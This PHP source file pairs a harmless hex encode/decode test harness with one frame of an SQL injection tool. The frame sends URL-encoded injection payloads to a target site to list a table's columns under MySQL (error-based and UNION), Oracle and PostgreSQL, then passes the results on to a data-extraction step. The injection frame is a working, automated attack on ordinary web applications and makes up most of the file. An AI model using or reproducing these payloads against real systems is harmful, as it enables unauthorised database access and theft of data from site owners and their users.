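/**
 * Exercise the hex helpers over every byte value 0x00..0xFF.
 *
 * Encodes the 256-byte string with hexEncode()/hexEncodeUpper(), then checks
 * that hexDecode() (either case), hexDecodeLower() and hexDecodeUpper() give
 * back exactly the original bytes, and that each case-strict decoder rejects
 * the opposite case by returning false. Progress is printed to stdout, one
 * line per check, ending with a PASSED/FAILED line.
 *
 * @return bool true if any check failed, false if every check passed. The
 *              sense is "has errors" so a caller can use it as an exit code.
 */
function testHex()
{
    $allBytes = '';
    for ($i = 0; $i < 256; $i++) {
        $allBytes .= chr($i);
    }
    $allBytesHex = hexEncode($allBytes);
    printf("hexEncode(allBytes) = %s\n", $allBytesHex);
    $allBytesHexUpper = hexEncodeUpper($allBytes);
    printf("hexEncodeUpper(allBytes) = %s\n\n", $allBytesHexUpper);

    $hasErrors = false;
    // Each decoder must accept its own case (hexDecode accepts both) and
    // return exactly the 256 input bytes, in order.
    if (!testHexRoundTrip('hexDecode(allBytesHexLower)', hexDecode($allBytesHex))) {
        $hasErrors = true;
    }
    if (!testHexRoundTrip('hexDecode(allBytesHexUpper)', hexDecode($allBytesHexUpper))) {
        $hasErrors = true;
    }
    if (!testHexRoundTrip('hexDecodeLower(allBytesHexLower)', hexDecodeLower($allBytesHex))) {
        $hasErrors = true;
    }
    if (!testHexRoundTrip('hexDecodeUpper(allBytesHexUpper)', hexDecodeUpper($allBytesHexUpper))) {
        $hasErrors = true;
    }

    printf("\nShould error:\n");
    // The case-strict decoders must reject the opposite case outright (false),
    // not silently decode it.
    if (!testHexRejects('hexDecodeLower(allBytesHexUpper)', hexDecodeLower($allBytesHexUpper))) {
        $hasErrors = true;
    }
    if (!testHexRejects('hexDecodeUpper(allBytesHexLower)', hexDecodeUpper($allBytesHex))) {
        $hasErrors = true;
    }

    if ($hasErrors) {
        printf("*** FAILED ***\n");
    } else {
        printf("*** PASSED ***\n");
    }
    return $hasErrors;
}

/**
 * Check that a decoder result is exactly the bytes 0x00..0xFF in order.
 *
 * Prints "<label> ret = <1|0>: good|bad" (1 when the decoder returned false).
 * The false/length check happens before indexing so a failed decode reports
 * "bad" without reading offsets of a non-string.
 *
 * @param string       $label   Name of the call under test, for the output line.
 * @param string|false $decoded Return value of the decoder under test.
 * @return bool true when the decode succeeded and every byte matched.
 */
function testHexRoundTrip($label, $decoded)
{
    printf("%s ret = %u: ", $label, $decoded === false ? 1 : 0);
    $good = $decoded !== false && strlen($decoded) === 256;
    for ($i = 0; $good && $i < 256; $i++) {
        if (ord($decoded[$i]) !== $i) {
            $good = false;
        }
    }
    printf("%s\n", $good ? "good" : "bad");
    return $good;
}

/**
 * Check that a decoder rejected its input by returning false.
 *
 * Prints "<label> ret = <1|0>: good|bad". (The original printed only the
 * return flag and dropped the good/bad verdict because the format string had
 * no placeholder for it.)
 *
 * @param string       $label   Name of the call under test, for the output line.
 * @param string|false $decoded Return value of the decoder under test.
 * @return bool true when the decoder returned false as required.
 */
function testHexRejects($label, $decoded)
{
    $rejected = $decoded === false;
    printf("%s ret = %u: %s\n", $label, $rejected ? 1 : 0, $rejected ? "good" : "bad");
    return $rejected;
}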
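/**
 * Frame 4 of the injection UI: enumerate the columns of one table on the
 * target and render them as a checkbox form that posts on to frame 15.
 *
 * Inputs come from the operator's previous form via $_POST: url, nombre
 * (table name), database, lol (1-based index into the per-engine template
 * array), sobras (trailing part of the target URL) and columnas (the submit
 * button that selects the engine/technique). The request templates and the
 * placeholder each template contains come from the globals $a/$b/$c/$d and
 * $payload_error/$payload_union/$payload_oracle/$payload_postgre.
 *
 * Two request shapes are built per engine: $querys asks the target for the
 * column count once, $query_n (carrying a literal "$i" placeholder) fetches
 * one column name per request inside the loop. Building SQL from the
 * operator's fields is this tool's purpose and is left as-is.
 *
 * Security note: everything this frame echoes back into its OWN page is
 * HTML-escaped — the operator's POST fields, $_SERVER['PHP_SELF'], and above
 * all the column names returned by the TARGET. The target's responses are
 * hostile input: a honeypot or a defended host can answer with markup that
 * would otherwise execute in the operator's browser. An unrecognised
 * "columnas" value now returns early instead of reaching the request loop
 * with $mode/$query/$count undefined.
 *
 * @return void Output is echoed directly.
 */
function frame4()
{
    html_header();
    global $a, $payload_error, $b, $payload_union, $databas, $c, $payload_oracle, $d, $payload_postgre;
    if (!isset($_POST['columnas'])) {
        return;
    }

    // Escaper for everything rendered into HTML (attribute values and text).
    // ISO-8859-1 is deliberate: with a UTF-8 charset htmlspecialchars() returns
    // '' for any invalid byte sequence, which would silently blank out names the
    // target sends back; byte-wise escaping keeps them and still neutralises
    // & < > " ' (multi-byte UTF-8 sequences never contain those bytes).
    $esc = function ($value) {
        return htmlspecialchars((string) $value, ENT_QUOTES, 'ISO-8859-1');
    };
    // Read a POST field as a string; arrays (url[]=...) and missing keys become ''.
    $field = function ($key) {
        return isset($_POST[$key]) && is_string($_POST[$key]) ? $_POST[$key] : '';
    };

    $url = $field('url');
    $table_n = $field('nombre');
    $database = $field('database');
    $vuln_index = $field('lol');
    $sobras = $field('sobras');
    $columnas = $field('columnas');
    $tabla = asciiEncode($table_n);
    // "lol" is the 1-based index of the injectable template; cast so a
    // non-numeric value cannot raise a TypeError in the subtraction.
    $templateIndex = (int) $vuln_index - 1;

    // Per engine: the count request ($querys), the per-row request template
    // ($query_n), the first row index, the adjustment from the returned count
    // to the last row index, and the label of the submit button for frame 15.
    if ($columnas === 'columns e-b') {
        $query = isset($a[$templateIndex]) ? $a[$templateIndex] : '';
        $querys = str_replace("{$payload_error}", "(SELECT+1906+FROM(SELECT+COUNT(%2A),CONCAT(0x3a6f79753a,(SELECT+MID((IFnull(CAST(COUNT(%2A)+AS+CHAR),0x20)),1,50)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name%3D{$table_n}+AND+table_schema%3D" . $database . "),0x3a70687a3a,floor(rand(0)%2A2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)", $query);
        $query_n = str_replace("{$payload_error}", '(SELECT%205724%20FROM(SELECT%20COUNT(%2A),CONCAT(0x3a6f79753a,(SELECT%20MID((IFnull(CAST(column_name%20AS%20CHAR),0x20)),1,50)%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D' . $table_n . '%20AND%20table_schema%3D' . $database . '%20LIMIT%20$i,1),0x3a70687a3a,floor(rand(0)%2A2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)', $query);
        $i = 0;
        $countOffset = -1;
        $datos = "data e-b";
    } elseif ($columnas === 'columns u-q') {
        $query = isset($b[$templateIndex]) ? $b[$templateIndex] : '';
        $querys = str_replace("{$payload_union}", "CONCAT(0x3a6f79753a,IFnull(CAST(COUNT(*)%20AS%20CHAR),0x20),0x3a70687a3a)", $query);
        $querys = str_replace("%23", "%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D" . $table_n . "%20AND%20table_schema%3D" . $database . "%23", $querys);
        $query_n = str_replace("{$payload_union}", '(SELECT%20CONCAT(0x3a6f79753a,IFnull(CAST(column_name%20AS%20CHAR),0x20),0x3a70687a3a)%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%3D' . $table_n . '%20AND%20table_schema%3D' . $database . '%20LIMIT%20$i,1)', $query);
        $i = 0;
        $countOffset = -1;
        $datos = "data u-q";
    } elseif ($columnas === 'columns o-eb') {
        $query = isset($c[$templateIndex]) ? $c[$templateIndex] : '';
        $table_n = asciiEncode($table_n);
        $table_n3 = CHRize($table_n);
        $querys = str_replace("{$payload_oracle}", "(REPLACE(REPLACE(REPLACE(REPLACE((SELECT%20NVL(CAST(COUNT(*)%20AS%20VARCHAR(4000))%2CCHR(32))%20FROM%20SYS.ALL_TAB_COLUMNS%20WHERE%20TABLE_NAME%3D" . $table_n3 . ")%2CCHR(32)%2CCHR(58)||CHR(121)||CHR(58))%2CCHR(36)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(64)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(35)%2CCHR(58)||CHR(102)||CHR(58)))", $query);
        $query_n = str_replace("{$payload_oracle}", '(REPLACE(REPLACE(REPLACE(REPLACE((SELECT%20NVL(CAST(COLUMN_NAME%20AS%20VARCHAR(4000))%2CCHR(32))%20FROM%20(SELECT%20COLUMN_NAME%2CDATA_TYPE%2CROWNUM%20AS%20LIMIT%20FROM%20SYS.ALL_TAB_COLUMNS%20WHERE%20TABLE_NAME%3D' . $table_n3 . '%20ORDER%20BY%201%20ASC)%20WHERE%20LIMIT%3D$i)%2CCHR(32)%2CCHR(58)||CHR(121)||CHR(58))%2CCHR(36)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(64)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(35)%2CCHR(58)||CHR(102)||CHR(58)))', $query);
        // Oracle's ROWNUM is 1-based and the returned count is already the last index.
        $i = 1;
        $countOffset = 0;
        $datos = "data o-eb";
    } elseif ($columnas === 'columns pg') {
        $query = isset($d[$templateIndex]) ? $d[$templateIndex] : '';
        $table_n = asciiEncode($table_n);
        $table_n3 = CHRize($table_n);
        $querys = str_replace("{$payload_postgre}", "(SELECT%20COALESCE(CAST(COUNT(*)%20AS%20CHARACTER(10000))%2C(CHR(32)))%20FROM%20pg_namespace,pg_type,pg_attribute%20b%20JOIN%20pg_class%20a%20ON%20a.oid%3Db.attrelid%20WHERE%20a.relnamespace%3Dpg_namespace.oid%20AND%20pg_type.oid%3Db.atttypid%20AND%20attnum>0%20AND%20a.relname%3D(" . $table_n3 . ")%20AND%20nspname%3D(CHR(112)||CHR(117)||CHR(98)||CHR(108)||CHR(105)||CHR(99)))", $query);
        $query_n = str_replace("{$payload_postgre}", '(SELECT%20COALESCE(CAST(attname%20AS%20CHARACTER(10000)),(CHR(32)))%20FROM%20pg_namespace,pg_type,pg_attribute%20b%20JOIN%20pg_class%20a%20ON%20a.oid%3Db.attrelid%20WHERE%20a.relnamespace%3Dpg_namespace.oid%20AND%20pg_type.oid%3Db.atttypid%20AND%20attnum%3E0%20AND%20a.relname%3D(' . $table_n3 . ')%20AND%20nspname%3D(CHR(112)||CHR(117)||CHR(98)||CHR(108)||CHR(105)||CHR(99))%20OFFSET%20$i%20LIMIT%201)', $query);
        $i = 0;
        $countOffset = -1;
        $datos = "data pg";
    } else {
        // Unknown button value: nothing to enumerate. Falling through would
        // reach the request loop with no query, index or count defined.
        return;
    }

    $phpSelf = isset($_SERVER['PHP_SELF']) ? $_SERVER['PHP_SELF'] : '';
    echo "\n\t\t\t\t<form action=\"" . $esc($phpSelf) . "?frame=15\" target=\"_blank\" method=\"post\" name=\"datos\" id=\"datos\">\n\t\t\t\t<input type=\"hidden\" name=\"url\" id=\"url\" value=\"" . $esc($url) . "\"/>\n\t\t\t\t\t<input type=\"hidden\" name=\"sobras\" id=\"sobras\" value=\"" . $esc($sobras) . "\"/>\n\t\t\t\t\t<input type=\"hidden\" name=\"database\" id=\"database\" value=\"" . $esc($database) . "\"/>\n\t\t\t\t<input type=\"hidden\" name=\"tn\" id=\"tn\" value=\"" . $esc($tabla) . "\"/>\n\t\t\t\t";

    // One request for the column count. GetBetween() is assumed to return the
    // extracted number as a string; the cast keeps a failed extraction ('' or
    // false) from raising a TypeError and simply yields an empty list.
    $count = (int) GetBetween(get_url($url . $querys . $sobras)) + $countOffset;
    while ($i <= $count) {
        // The "$i" in $query_n is literal text (single-quoted template); substitute the row index now.
        $query_nombre = str_replace('$i', "{$i}", $query_n);
        $nombre = GetBetween(get_url($url . $query_nombre . $sobras));
        // $nombre is raw target output: escape both the hex value and the visible label.
        echo "<input type=\"checkbox\" name=\"nombre[]\" id=\"nombre\" value=\"" . $esc(hexEncode($nombre)) . "\">" . $esc($nombre) . "</input><br>";
        $i++;
    }
    echo "<input type=\"hidden\" name=\"lol\" id=\"lol\" value=\"" . $esc($vuln_index) . "\"/>";
    echo "<input type=\"submit\" name=\"datos\" id=\"datos\" value=\"" . $esc($datos) . "\"/>";
    echo "</form>";
}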